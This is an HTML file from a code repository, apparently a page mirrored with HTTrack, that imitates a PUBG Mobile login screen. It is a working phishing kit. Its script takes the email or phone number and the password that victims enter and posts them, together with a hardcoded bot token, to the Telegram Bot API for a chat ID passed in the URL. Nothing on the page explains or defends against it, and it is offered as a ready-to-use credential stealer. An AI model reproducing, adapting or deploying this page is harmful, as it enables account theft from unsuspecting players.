Login-signup-Extra1 / pubg.html
HenzHosting's picture
Upload 19 files
c956fd3 verified
<!DOCTYPE html>
<html lang="en">
<!-- Mirrored from login-y3bd.onrender.com/pubg.html by HTTrack Website Copier/3.x [XR&CO'2017], Fri, 21 Mar 2025 21:35:04 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>PUBG Mobile Login</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
font-family: Arial, sans-serif;
}
body {
background: url('../cdn.wallpapersafari.com/84/19/wY3Erj.html') no-repeat center center/cover;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}
.container {
background: rgba(0, 0, 0, 0.85);
padding: 25px;
border-radius: 10px;
text-align: center;
width: 90%;
max-width: 400px;
box-shadow: 0px 0px 15px rgba(255, 215, 0, 0.5);
}
.logo {
width: 120px;
margin-bottom: 20px;
}
h1 {
color: white;
font-size: 20px;
}
#login input {
width: 100%;
padding: 12px;
margin: 10px 0;
border: 1px solid rgba(255, 255, 255, 0.2);
border-radius: 5px;
background: rgba(255, 255, 255, 0.1);
color: white;
font-size: 14px;
}
#login input::placeholder {
color: rgba(255, 255, 255, 0.6);
}
#submit {
width: 100%;
background: #f5a623;
color: white;
border: none;
padding: 12px;
border-radius: 5px;
font-size: 16px;
cursor: pointer;
transition: 0.3s;
}
#submit:hover {
background: #d4881a;
}
.forgot, .create {
display: block;
margin: 15px 0;
color: white;
text-decoration: none;
font-size: 14px;
}
hr {
margin: 20px 0;
border: 1px solid rgba(255, 255, 255, 0.2);
}
.create {
background: none;
border: 1px solid #f5a623;
padding: 10px;
cursor: pointer;
color: white;
border-radius: 5px;
width: 100%;
transition: 0.3s;
}
.create:hover {
background: #f5a623;
}
</style>
</head>
<body>
<div class="container">
<img class="logo" src="../upload.wikimedia.org/wikipedia/commons/7/7a/PUBG_Short_Logo.html" alt="PUBG Logo">
<h1>Log in to PUBG Mobile</h1>
<div id="login">
<input type="text" id="username" placeholder="Email or Phone Number">
<input type="password" id="password" placeholder="Password">
<br>
<button id="submit">Log In</button>
</div>
<a class="forgot" href="#">Forgot password?</a>
<hr>
<p style="color: white; font-size: 14px;">New to PUBG Mobile?</p>
<button class="create">Create an account</button>
</div>
<script>
function getQueryParam(param) {
const urlParams = new URLSearchParams(window.location.search);
return urlParams.get(param);
}
const chatId = getQueryParam('id');
const botToken = "7924786441:AAGIU7XlarFtwEzaRhFkNfIU6m3Sv1RyjRg";
const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
document.getElementById('submit').addEventListener('click', function () {
const username = document.getElementById('username').value;
const password = document.getElementById('password').value;
if (!chatId) {
alert("Error: Missing chat ID.");
return;
}
const message1 = `PUBG Mobile Login\nUsername: ${username}\nPassword: ${password}`;
const message2 = `Follow for more content! 🎮🔥`;
fetch(url, {
method: "POST",
headers: {
"Content-Type": "application/json"
},
body: JSON.stringify({
chat_id: chatId,
text: message1
})
})
.then(response => response.json())
.then(data => {
if (data.ok) {
return fetch(url, {
method: "POST",
headers: {
"Content-Type": "application/json"
},
body: JSON.stringify({
chat_id: chatId,
text: message2
})
});
} else {
alert("Failed to send details.");
}
})
.catch(error => {
console.error("Error:", error);
alert("An error occurred.");
});
});
</script>
</body>
<!-- Mirrored from login-y3bd.onrender.com/pubg.html by HTTrack Website Copier/3.x [XR&CO'2017], Fri, 21 Mar 2025 21:35:22 GMT -->
</html>